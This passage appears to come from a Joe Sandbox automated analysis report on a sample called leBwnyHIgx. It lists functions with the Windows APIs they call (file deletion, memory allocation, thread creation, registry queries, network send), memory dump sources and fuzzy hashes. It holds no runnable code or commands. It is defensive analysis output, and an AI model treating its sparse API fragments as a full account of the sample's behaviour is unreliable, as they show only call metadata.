                                                                                    • Instruction Fuzzy Hash: F9E01AB1A40109AFE740CBE4CC85F2A77B8EB0C301F148109FA0CEB2A0D631DA508BA2
                                                                                    Function 0040E4B8 Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadStringW.USER32(00000000,00010000,?,00001000), ref: 0040E4FD
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: LoadString
                                                                                    • String ID:
                                                                                    • API String ID: 2948472770-0
                                                                                    • Opcode ID: 8f13a3bbcb92e65e3f2aea17991442021eb2561ecef5d5fcc5ebd3e194779de1
                                                                                    • Instruction ID: a47970919856236c0168dc23f1bd1acf46059580e87ddf9fa247c61dd49d6e22
                                                                                    • Opcode Fuzzy Hash: 8f13a3bbcb92e65e3f2aea17991442021eb2561ecef5d5fcc5ebd3e194779de1
                                                                                    • Instruction Fuzzy Hash: 84F096B1700200ABDB10DA5ECCC5B5732CC9B58349F048876B508EB396EA38DC1487AA
                                                                                    Function 10012F10 Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 10012C90: ?eback@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(100053B9,?,10012F2A,?,100053B9), ref: 10012C9A
                                                                                      • Part of subcall function 10012C90: ?setg@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXPAD00@Z.MSVCP140(CCC35DE5,CCC35DE5,8B55CCCC,?,10012F2A,?,100053B9), ref: 10012CC2
                                                                                    • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(0175FE68,?,100053B9), ref: 10012F4D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4135367303.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4135346021.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4135394974.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4135417512.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4135440852.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: D@std@@@std@@U?$char_traits@$?eback@?$basic_streambuf@?setg@?$basic_streambuf@D00@fclose
                                                                                    • String ID:
                                                                                    • API String ID: 2996004546-0
                                                                                    • Opcode ID: 709d4a9117c949bef376609371d5c1e3fdd0bce17311b82dc2022546a51ab83c
                                                                                    • Instruction ID: a9d9b0767c6718a53788ed456b677ecfb587c67211e8534dc0a09bbe97dd6693
                                                                                    • Opcode Fuzzy Hash: 709d4a9117c949bef376609371d5c1e3fdd0bce17311b82dc2022546a51ab83c
                                                                                    • Instruction Fuzzy Hash: C001C9B4A04209EBDB04DF94D996B9DBBB5EF40704F2080A8E9016F391DB71EF95DB81
                                                                                    Function 0040B920 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleFileNameW.KERNEL32(00400000,?,0000020A), ref: 0040B93E
                                                                                      • Part of subcall function 0040CBAC: GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040CC66,?,00400000,0065DC28), ref: 0040CBE8
                                                                                      • Part of subcall function 0040CBAC: LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0040CC66,?,00400000,0065DC28), ref: 0040CC39
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileModuleName$LibraryLoad
                                                                                    • String ID:
                                                                                    • API String ID: 4113206344-0
                                                                                    • Opcode ID: 92830e843a0290b8fb819179a769738ed0c8430f51dc52ce8e13e1d58c902946
                                                                                    • Instruction ID: b028abd3538c11208bb69536d004979ed80801884fb39c7b18fc8ecc13332f26
                                                                                    • Opcode Fuzzy Hash: 92830e843a0290b8fb819179a769738ed0c8430f51dc52ce8e13e1d58c902946
                                                                                    • Instruction Fuzzy Hash: DDE0EDB1A403109BCB10DF58C8C5A473BE8AB08754F044A66ED68DF386D375DD1087D5
                                                                                    Function 0271608A Relevance: 1.5, APIs: 1, Instructions: 25registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4133967983.0000000002711000.00000020.00001000.00020000.00000000.sdmp, Offset: 02710000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4133938854.0000000002710000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134001989.0000000002725000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134035437.0000000002729000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134065766.000000000272F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134094665.0000000002731000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_2710000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Open
                                                                                    • String ID:
                                                                                    • API String ID: 71445658-0
                                                                                    • Opcode ID: c75868d4a3e6626dc216ddd18a54ca7b7a4557e3fac66c41a904d5f98f9b8806
                                                                                    • Instruction ID: 3dd3dc386c6db90f563675017eed44103210d726a05c7c237282a7aa23cf19ad
                                                                                    • Opcode Fuzzy Hash: c75868d4a3e6626dc216ddd18a54ca7b7a4557e3fac66c41a904d5f98f9b8806
                                                                                    • Instruction Fuzzy Hash: 3FE0D874D08225EACB24CB54D584BFD73B5BF50704F608145D00637484D3786B0CCBD2
                                                                                    Function 10012400 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 10012F10: fclose.API-MS-WIN-CRT-STDIO-L1-1-0(0175FE68,?,100053B9), ref: 10012F4D
                                                                                    • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000002,00000000,?,10005395), ref: 1001242D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4135367303.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4135346021.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4135394974.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4135417512.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4135440852.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: ?setstate@?$basic_ios@D@std@@@std@@U?$char_traits@fclose
                                                                                    • String ID:
                                                                                    • API String ID: 2040537880-0
                                                                                    • Opcode ID: 93dd7eb5169e86885b55c767c8327cd94ed4ae90235ab5dc8049e23af4a0f4b1
                                                                                    • Instruction ID: b5d0b15e863f3ba68657ea4ca4a108191cbcefbbccc9c59a0a057f78330705e7
                                                                                    • Opcode Fuzzy Hash: 93dd7eb5169e86885b55c767c8327cd94ed4ae90235ab5dc8049e23af4a0f4b1
                                                                                    • Instruction Fuzzy Hash: 1FE01A74A00208EFDB08DB94C981B6CBBB5EF85305F6081A8D9066B381D631AE22DB84
                                                                                    Function 02715E07 Relevance: 1.5, APIs: 1, Instructions: 14registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4133967983.0000000002711000.00000020.00001000.00020000.00000000.sdmp, Offset: 02710000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4133938854.0000000002710000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134001989.0000000002725000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134035437.0000000002729000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134065766.000000000272F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134094665.0000000002731000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_2710000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: QueryValue
                                                                                    • String ID:
                                                                                    • API String ID: 3660427363-0
                                                                                    • Opcode ID: bc9ecc6ca19783af6d6fbb40ca28845bcba02b8ce6e2273daa9cad6eb9c5806e
                                                                                    • Instruction ID: e6b688fce386662eef00040f6041382866d4b7c838bae812b7aa74dfc8be8b75
                                                                                    • Opcode Fuzzy Hash: bc9ecc6ca19783af6d6fbb40ca28845bcba02b8ce6e2273daa9cad6eb9c5806e
                                                                                    • Instruction Fuzzy Hash: 84C08C20C8C7BDE2822058181C0A17DB2F44B05211F1005A3E80B35C80E4A93688CAEB
                                                                                    Function 10005520 Relevance: 1.5, APIs: 1, Instructions: 12fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • DeleteFileA.KERNEL32(1000A58A,?,1000A58A,00000000,?,?,?,0000005C,?), ref: 10005527
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4135367303.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4135346021.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4135394974.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4135417512.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4135440852.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: DeleteFile
                                                                                    • String ID:
                                                                                    • API String ID: 4033686569-0
                                                                                    • Opcode ID: 3d5163279ec740a988f09b9f2e08219c395a46ee1d8e65d4cb22b1e97629421d
                                                                                    • Instruction ID: f2f8e3d453fe78865ccc53f7e24a17e21a0dec87b166a9a16b5ac37ce018f2ca
                                                                                    • Opcode Fuzzy Hash: 3d5163279ec740a988f09b9f2e08219c395a46ee1d8e65d4cb22b1e97629421d
                                                                                    • Instruction Fuzzy Hash: 5BC02B7520471C57AF808EE4BC448CB33ECD7095C33004000FE0CCB100C532E7019B60
                                                                                    Function 02714274 Relevance: 1.5, APIs: 1, Instructions: 11threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4133967983.0000000002711000.00000020.00001000.00020000.00000000.sdmp, Offset: 02710000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4133938854.0000000002710000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134001989.0000000002725000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134035437.0000000002729000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134065766.000000000272F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134094665.0000000002731000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_2710000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateThread
                                                                                    • String ID:
                                                                                    • API String ID: 2422867632-0
                                                                                    • Opcode ID: da21fe9d96320cf91e7721b90f7483afcb0a319c9e4ecf3c11d3c7986d5dbfdd
                                                                                    • Instruction ID: 200bb22f749c4f926125f24a398a0d496fe3fdf0cd894fcaee075e241aa98633
                                                                                    • Opcode Fuzzy Hash: da21fe9d96320cf91e7721b90f7483afcb0a319c9e4ecf3c11d3c7986d5dbfdd
                                                                                    • Instruction Fuzzy Hash: EAC048A4B8D224E9F63951682D17B2659203B86B25F608722F7237D8D788A00088D563
                                                                                    Function 027160DF Relevance: 1.5, APIs: 1, Instructions: 11threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0272FAB1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4133967983.0000000002711000.00000020.00001000.00020000.00000000.sdmp, Offset: 02710000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4133938854.0000000002710000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134001989.0000000002725000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134035437.0000000002729000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134065766.000000000272F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134094665.0000000002731000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_2710000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentThread
                                                                                    • String ID:
                                                                                    • API String ID: 2882836952-0
                                                                                    • Opcode ID: 73d9b97297f7a4ddd935d8e5a33710043e457d514a00fbfca2d048d5973f3050
                                                                                    • Instruction ID: 039eeac030d10da204218e3ff0b6c004b39d21246c70e942c4047761443042bf
                                                                                    • Opcode Fuzzy Hash: 73d9b97297f7a4ddd935d8e5a33710043e457d514a00fbfca2d048d5973f3050
                                                                                    • Instruction Fuzzy Hash: 8DD012B4104520C7D314EB64C58860EB2F2BF44300F60C915C51A92E10C638E849CAA7
                                                                                    Function 0042866F Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetErrorMode.KERNEL32(?,0042868D), ref: 00428680
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorMode
                                                                                    • String ID:
                                                                                    • API String ID: 2340568224-0
                                                                                    • Opcode ID: 66a180434acd903a05dc67d5e34fa237f32a14c00a9ee3962d59800cd762fd6b
                                                                                    • Instruction ID: 696cc173350d5948746636284ada699740c3da0e40302307c28099bcb0f56c81
                                                                                    • Opcode Fuzzy Hash: 66a180434acd903a05dc67d5e34fa237f32a14c00a9ee3962d59800cd762fd6b
                                                                                    • Instruction Fuzzy Hash: 77B09B7670C2145EAF05DBA5791155C67D4D7C87107E1446BF114C3540D97C54148528
                                                                                    Function 10005740 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetFileAttributesA.KERNEL32(00000000,00000080,?,1000B3D6,?,00000000), ref: 10005751
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4135367303.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4135346021.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4135394974.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4135417512.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4135440852.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: AttributesFile
                                                                                    • String ID:
                                                                                    • API String ID: 3188754299-0
                                                                                    • Opcode ID: 123067e2a9cf58ddff2a572c946f291cd475b681d30bc16dccd5dbc98fb432a1
                                                                                    • Instruction ID: ee6079dce25d93f15e917eacbc87c037c8b3b96b664cac2b0563e90788469a29
                                                                                    • Opcode Fuzzy Hash: 123067e2a9cf58ddff2a572c946f291cd475b681d30bc16dccd5dbc98fb432a1
                                                                                    • Instruction Fuzzy Hash: BEB09B3454030C67D5446B51DC59E15771CF7456D1F004450F94D57151CF75FA4447D8
                                                                                    Function 10004A70 Relevance: 1.5, APIs: 1, Instructions: 9COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4135367303.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4135346021.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4135394974.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4135417512.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4135440852.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: allocator
                                                                                    • String ID:
                                                                                    • API String ID: 3447690668-0
                                                                                    • Opcode ID: 817b939fb322faf8aa4a8908d91c84128208cf71eecda2aa4e4aa1b252350f97
                                                                                    • Instruction ID: 49106881f87acc91c15ffb423cd80b113fa76448b9a27e8f77458942fb597c13
                                                                                    • Opcode Fuzzy Hash: 817b939fb322faf8aa4a8908d91c84128208cf71eecda2aa4e4aa1b252350f97
                                                                                    • Instruction Fuzzy Hash: 7EC0927425820CAB8B08DF88E891C6973ADEB89650B008169BC0E8B352CE30BD40CA9D
                                                                                    Function 0040E56C Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: InfoSystem
                                                                                    • String ID:
                                                                                    • API String ID: 31276548-0
                                                                                    • Opcode ID: 899fa9c962831e78d20aa585cacba709b3b6a16b28d6df11c32fd39be051b51c
                                                                                    • Instruction ID: 47ab257af6e364695ea890f9b43c82e37ccfc4e8ddd737aab863078b62403aa0
                                                                                    • Opcode Fuzzy Hash: 899fa9c962831e78d20aa585cacba709b3b6a16b28d6df11c32fd39be051b51c
                                                                                    • Instruction Fuzzy Hash: 0DA012108084001AC404BB194C4340F39C45941514FC40264745CB56C2E61A866403DB
                                                                                    Function 0272F63D Relevance: 1.5, APIs: 1, Instructions: 3networkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4134065766.000000000272F000.00000020.00001000.00020000.00000000.sdmp, Offset: 02710000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4133938854.0000000002710000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4133967983.0000000002711000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134001989.0000000002725000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134035437.0000000002729000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134094665.0000000002731000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_2710000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: send
                                                                                    • String ID:
                                                                                    • API String ID: 2809346765-0
                                                                                    • Opcode ID: f5630145063bab356e7fb3726eeaa839f6df9b7befddfe279059b26bdf28bc06
                                                                                    • Instruction ID: 36c17b40a1917c3e0e977767f4fd81cea8de6f80ba72861d125d2528aaa677a0
                                                                                    • Opcode Fuzzy Hash: f5630145063bab356e7fb3726eeaa839f6df9b7befddfe279059b26bdf28bc06
                                                                                    • Instruction Fuzzy Hash: 8B9002286C4561AB52140921684865B26A455056513457814D403D0401D6208258A555
                                                                                    Function 00403C6C Relevance: 1.3, APIs: 1, Instructions: 41memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004,-00000004,000000BF,00404283,0000001B,00404828,02683360,0040726E,0040760F,?,00000000,02683360,004072DD), ref: 00403C83
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 4275171209-0
                                                                                    • Opcode ID: d39b22df79555fe4438253863038b616525278bed3867586134d7713ba648576
                                                                                    • Instruction ID: f9c7199d2a20b3d4535cb586bdcc75df61911083c239a6e183f6db4c37c8fba7
                                                                                    • Opcode Fuzzy Hash: d39b22df79555fe4438253863038b616525278bed3867586134d7713ba648576
                                                                                    • Instruction Fuzzy Hash: EBF0A9F2B003214FE714DFB89E41702BBEAE748355F11427EE989EB798D7B09901A784
